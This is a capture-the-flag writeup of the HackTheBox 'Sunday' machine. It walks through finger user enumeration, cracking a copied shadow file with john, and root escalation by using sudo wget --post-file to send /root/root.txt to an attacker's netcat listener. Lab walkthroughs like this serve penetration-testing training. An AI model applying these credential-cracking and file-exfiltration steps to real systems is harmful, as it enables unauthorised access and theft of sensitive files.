HackTheBox – Sunday Writeup

Hi All, Today we are going to solve  ‘Sunday’ machine from hackthebox. This was one of the easiest boxes on HTB. Lets begin with nmap scan.

nmap -p- 10.10.10.76

<<snipped>>

PORT                   STATE         SERVICE
79/tcp                 open             finger

22022                 open              SSH

<<snipped>>

This was the most frustrating part, as the services on this box were unstable and unresponsive.

so, we can use finger  service to enumerate users on the box.

we can use a custom wordlist and finally make use of this enum script by pentest monkey :

http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

we find that a user named sunny exists on the remote machine. through the list.

root@kali:~# finger sunny@10.10.10.76
Login Name   TTY     Idle         When                        Where
sunny sunny    pts/3            <Apr 24 01:51>     10.10.14.7

we also found out that after few brute attempts, we can use sunny user to login with password sunday. Lets use this to SSH in to the victim box.

root@kali:~# ssh sunny@10.10.10.76 -p 22022

password : sunday

Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ ls
Desktop Documents Downloads local.cshrc local.login local.profile Public

 

we are in! but after quick enumeration it was found out we cannot read “user.txt” as its owned by another user named sammy.

sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
cat: user.txt: Permission denied

after looking around, we find an interesting backup file in the backup folder .

sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup shadow.backup

its backup of shadow file! lets copy it back to our attacker box along with /etc/passwd file and crack it using john.

sunny@sunday:/backup$ cat shadow.backup
<<snipped>>

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

<<snipped>>

on our attacker box , first lets convert it to a format so john can crack it.

root@kali#unshadow passwd shadow > pass.db

root@kali# john pass.db –wordlist=/root/Downloads/rockyou.txt

root@kali# john –show pass.db
sammy: cooldude! :101:10:sammy:/export/home/sammy:/bin/bash
sunny: sunday :65535:1:sunny:/export/home/sunny:/bin/bash

2 password hashes cracked, 0 left

cool! now we know password for sammy user as cooldude!

Lets SSH in using the creds and quickly grab the user.txt flag.

root@kali:~# ssh sammy@10.10.10.76 -p 22022
Password: cooldude!

sammy@sunday:~/Desktop$ cat user.txt

Now lets move on to privilege escalation to root user.

by enumerating the box, we found out sammy can run few commands as root. he can run wget  as root  . This is another classic priv esc technique in which we can read files owned by root.

sammy@sunday:~/Desktop$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget

wget has –post-file option which can be used to post file contents to a remote server

For this , we will read root flag using this vector.

lets setup a netcat listener on our attacker box :

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 …

and on victim box,

sudo wget –post-file=/root/root.txt 10.10.14.13:8000

we should be able to receive the content of root flag by now on our netcat listener .

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 …
10.10.10.76: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.76] 42964
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.13:8000
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

<<contents of root flag>>

I also tried replacing the /etc/passwd file with our added user on to the victim server using another wget priv esc vector. for some reason it failed.

nevertheless, we grabbed the  root flag 🙂 stay tuned for next writeup!